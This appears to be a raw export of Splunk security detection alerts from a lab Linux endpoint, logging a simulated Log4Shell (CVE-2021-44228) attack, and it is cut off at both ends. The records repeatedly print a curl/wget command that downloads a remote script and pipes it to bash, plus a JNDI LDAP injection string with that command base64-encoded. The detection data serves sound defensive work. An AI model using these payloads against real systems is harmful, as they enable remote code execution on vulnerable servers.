Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640354, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="PR.DS", annotations._all="T1190", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640354, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="PR.DS", annotations._all="T1190", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", 